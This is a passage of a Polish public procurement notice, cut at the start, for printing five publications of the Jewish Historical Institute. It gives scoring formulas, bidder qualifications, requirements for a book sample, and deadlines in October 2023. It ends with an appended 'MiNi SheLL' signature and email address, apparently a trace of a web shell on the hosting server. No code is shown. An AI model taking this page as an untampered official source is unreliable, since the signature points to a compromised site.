punktów, tj. Cmin = 8 pkt. Punkty pozostałych ofert zostaną przeliczone zgodnie z: (Cmin : Cb) × 8 pkt, gdzie: Cmin – cena oferty minimalnej, Cb – cena oferty badanej.<br/>1.2.5.	dla druku nr 5 (C5): oferta z najniższą ceną uzyska maksymalną liczbę punktów, tj. Cmin = 5 pkt. Punkty pozostałych ofert zostaną przeliczone zgodnie z: (Cmin : Cb) × 5 pkt, gdzie: Cmin – cena oferty minimalnej, Cb – cena oferty badanej.<br/>1.3.	Suma punktów przyznanych w tym kryterium będzie obliczana zgodnie ze wzorem: C = C1 + C2 + C3 + C4+ C5<br/>2. Kryterium „Jakość próbek” (J)<br/>2.1. W tym kryterium punkty będą przyznawane metodą zero-jedynkową, w każdym z wymienionych podkryteriów, na podstawie indywidualnej oceny każdego członka komisji przetargowej przedstawionych przez Wykonawcę próbek. Każdy członek komisji przetargowej będzie mógł przyznać ofercie maksymalnie do 8 punktów w tym kryterium. Maksymalna liczba punktów to 32.<br/>2.3 Podczas oceny ofert w tym kryterium stosowany będzie następujący sposób przydziału punktów:<br/>Lp. Nazwa Kryterium/podkryterium<br/>1. Szycie, klejenie i łączenie oprawy z blokiem<br/>1.1. Trwałość szycia i klejenia bloku (czy zszyte kartki się nie rozchodzą<br/>i są trwale połączone)<br/>1.2. Estetyka szycia i klejenia (brak wystających elementów szycia, brak nadmiaru kleju)<br/>1.3. Trwałość przymocowania kapitałek do grzbietu (czy kapitałki nie odstają od bloku)<br/>1.4. Trwałość i estetyka połączenia wyklejki z oprawą twardą<br/>2. Cięcie i składanie bloku<br/>2.1. Równość cięcia bloku (czy z bloku nie wystają nierówno przycięte i złożone kartki)<br/>3. Druk<br/>3.1. Czystość zadruku czarno-białego i kolorowego na papierze (brak zacieków, rozmazań, przesunięć zadruku, zanieczyszczeń)<br/>3.2. Ostrość druku zdjęć (uzyskanie wyraźnego, odpowiednio kontrastowego obrazu)<br/>4. Uszlachetnienia okładki<br/>4.1. Czy elementy hot-stampingu są spasowane z główną warstwą wydruku (z zachowaniem tolerancji do 0,5 mm)<br/>2.4. Suma punktów przyznanych w tym kryterium w ramach każdej przedstawionej oferty będzie obliczana według wzoru: J = J1 + J2 + J3 + J4<br/>3.	Kryterium „Termin realizacji Przedmiotu zamówienia” (T):<br/>3.1.	Wykonawca szacuje czas realizacji każdego z 5 druków będących przedmiotem zamówienia. Termin ten będzie brany pod uwagę w trakcie wyboru oferty najkorzystniejszej.<br/>3.2.	Maksymalna liczba punktów do zdobycia w tym kryterium to 10.<br/>3.3.	Oferta z najkrótszym uśrednionym terminem realizacji każdego z 5 druków będących przedmiotem zamówienie uzyska maksymalną liczbę punktów, tj. Tmin = 10 pkt. Punkty pozostałych ofert zostaną przeliczone zgodnie z następującym wzorem: (Tmin : Tb) x 10 pkt, gdzie: Tmin – termin oferty minimalnej, Tb – termin oferty badanej.<br/>3.4.	Termin realizacji przedmiotu zamówienia nie może być krótszy niż 10 dni i nie dłuższy niż 14.<br/>4.	Ostateczna ocena stanowić będzie sumę punktów uzyskanych w obu kryteriach: O = C + J + T.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">58</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość próbek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">32</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji Przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia w niniejszym postępowaniu, zgodnie z art. 112 ust. 2 upzp, mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu, w następującym zakresie: <br/>1.1.	zdolności do występowania w obrocie gospodarczym: nie dotyczy,<br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów: nie dotyczy,<br/>1.3.	sytuacji ekonomicznej lub finansowej: nie dotyczy<br/>1.4.	zdolności technicznej lub zawodowej:<br/>1.4.1.	zrealizowanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy, to w tym okresie, co najmniej 3 usług druku publikacji książkowych o wartości co najmniej 20 000,00 zł (słownie: dwadzieścia tysięcy złotych) netto każda, <br/>1.4.2.	dysponowanie co najmniej:<br/>1.4.2.1.	minimum dwiema maszynami do druku cyfrowego, w tym:<br/>1.4.2.1.1.	jedną maszyną do druku cyfrowego fullcolor;<br/>1.4.2.1.2.	jedną maszyną do druku cyfrowego czarno-białego;<br/>1.4.2.2.	minimum czterema maszynami introligatorskimi, w tym:<br/>1.4.2.2.1.	jedną maszyną do oprawy twardej o wydajności nie mniejszej niż 200 składek na godzinę,<br/>1.4.2.2.2.	jednym zestawem maszyn do oprawy zeszytowej o wydajności nie mniejszej niż 1000 egz. na godzinę.<br/>1.4.2.2.3.	jedną maszyną do szycia nićmi w formacie minimum 440 mm x 20 mm<br/>o wydajności nie mniejszej niż 3000 składek na godzinę,<br/>1.4.2.2.4.	jedną czterokieszeniową maszyną do oprawy miękkiej.<br/>2.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>3.	Zgodnie z art. 117 ust. 3 i 4 upzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy są zobowiązani złożyć oświadczenie, które usługi wykonają poszczególni Wykonawcy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>4.	Zgodnie z art. 118 ust. 1 oraz ust. 2 upzp Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu może polegać na zasobach podmiotu udostępniającego zasoby niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych, jeśli podmioty te wykonają usługi do realizacji, których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu<br/>potwierdzenia braku podstaw wykluczenia Wykonawca złoży wraz z ofertą oświadczenie, o którym mowa w art. 125 ust. 1 upzp,<br/>stanowiące załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Wykonawca na wezwanie Zamawiającego winien złożyć poprzez platformę e-Zamówienia następujące dokumenty:<br/>2.1.	na potwierdzenie spełniania warunku opisanego w § 10 ust. 1 pkt 1.4. ppkt 1.4.1. SWZ: wykaz usług (Załącznik nr 7 do SWZ) wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>Okresy wyrażone w latach lub miesiącach, liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz dotyczy tych usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył,<br/>2.2.	na potwierdzenie spełniania warunku opisanego w § 10 ust. 1 pkt 1.4. ppkt 1.4.2. SWZ: wykaz parku maszynowego, tj. urządzeń będących w posiadaniu lub użytkowaniu przez Wykonawcę <br/>(Załącznik nr 8 do SWZ),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Wykonawca zobowiązany jest złożyć jedną próbkę zgodnie z poniższą specyfikacją w celu dokonania oceny jakości: <br/>1.1.	jedną książkę o objętości nie mniejszej niż 100 stron, w formacie nie mniejszym <br/>niż 125 × 200 mm, w oprawie twardej, z blokiem szytym nićmi, z kapitałkami i merlą, wykonanym w technologii druku cyfrowego, zawierającej co najmniej dwie wydrukowane fotografie, w kolorystyce środka co najmniej 4+4, na papierze typu Munken o gramaturze nie mniejszej niż 90 g/m2 lub równoważnym, tj. na papierze niepowlekanym o dużym spulchnieniu i nieprzezroczystości o gramaturze nie mniejszej niż 90 g/m2, z zadrukiem okładki co najmniej 4+0, z hot-stampingiem na wybranych elementach.<br/>2.	W zakresie złożenia próbki Zamawiający, na podstawie art. 65 ust. 1 pkt 4) upzp, odstępuje od wymogu użycia środków komunikacji elektronicznej.<br/>Próbkę należy złożyć w formie fizycznej siedzibie Zamawiającego z dopiskiem „Dotyczy postępowania o zamówienie publiczne na druk 5 wydawnictw Żydowskiego Instytutu Historycznego z jednoczesnym podaniem danych Wykonawcy.<br/>Jeżeli próbka zostanie złożona w inny niż wyżej opisany sposób, Zamawiający nie bierze odpowiedzialności za przypadkowe otwarcie przesyłki. Wybór drogi pocztowej dla przesłania próbki następuje na ryzyko Wykonawcy. Wykonawca winien we własnym interesie, w taki sposób przygotować przesyłkę, aby w stopniu maksymalnym zapobiec jej uszkodzeniu w czasie transportu.<br/>W przypadku złożenia próbki za pośrednictwem firmy kurierskiej Zamawiający zaleca, aby opakowanie kurierskie również było opisane w powyższy sposób.<br/>Zamawiający nie bierze odpowiedzialności za niewłaściwe i niezgodne z powyższą instrukcją opisanie przesyłki, a w przypadku otwarcia takiej przesyłki przez Zamawiającego po terminie otwarcia ofert zawarta w środku próbka zostanie potraktowana jako próbka złożona po terminie - nawet jeżeli wpłyną do Zamawiającego przed upływem terminu składania ofert.<br/>Mając na uwadze zapisy art. 107 ust. 3 upzp, Zamawiający informuje, że przedmiotowe środki dowodowe o których mowa w niniejszym ustępie nie podlegają uzupełnieniu, ponieważ służą potwierdzeniu zgodności z kryteriami określonymi w opisie kryteriów oceny ofert.<br/>Brak złożenia próbki, złożenie próbki po terminie, złożenie próbki w innym miejscu niż wskazane lub złożenie próbki niezgodnych z wymaganiami Zamawiającego skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 2 ppkt. c) upzp.<br/>Wykonawcom, przysługuje możliwość zwrotu próbek na pisemny wniosek. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz ofertowy (Załącznik nr 2 do SWZ) (obligatoryjnie),<br/>2.	Dokumenty potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 upzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach, tj. odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu Ofertowym wskazał dane umożliwiające dostęp do tych dokumentów (obligatoryjnie),<br/>3.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (Załącznik nr 3 do SWZ) (obligatoryjnie),<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w § 10 SWZ;<br/>Oświadczenie, o którym mowa w niniejszym punkcie, składają odrębnie:<br/>3.1.	Wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>3.2.	Podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>4.	W przypadku Wykonawców wspólnie ubiegający się o udzielenie zamówienia należy dołączyć do oferty oświadczenie, z którego wynika jaki zakres rzeczowy wykonania zamówienia realizować zamierzają poszczególni wykonawcy, tj.: oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 upzp, które wykonają poszczególni Wykonawcy – Załącznik nr 4 do SWZ,<br/>5.	Oświadczenie o udostępnieniu zasobów, tj. zobowiązanie innego podmiotu do udostępnienia zasobów stosownie do treści art. 118 upzp – Załącznik nr 5 do SWZ (jeśli Wykonawca polega na zasobach innych podmiotów),<br/>6.	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>7.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>8.	Do oferty każdy Wykonawca musi dołączyć przedmiotowe środki dowodowe na potwierdzenie, że oferowane usługi spełniają określone przez Zamawiającego wymagania, tj. Wykonawca zobowiązany jest złożyć jedną próbkę zgodnie z poniższą specyfikacją w celu dokonania oceny jakości: <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W takiej sytuacji Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Zamawiający nie może wymagać od Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku o dopuszczenie do udziału<br/>w przedmiotowym postępowaniu.<br/>4.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>5.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa<br/>w art. 125 ust. 1 upzp składa każdy z Wykonawców.<br/>7.	W odniesieniu do warunków dotyczących doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia, mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają ci poszczególni wykonawcy.<br/>8.	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych dokumentów.<br/>9.	Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z dokumentów, o których mowa w pkt powyżej zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-04 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com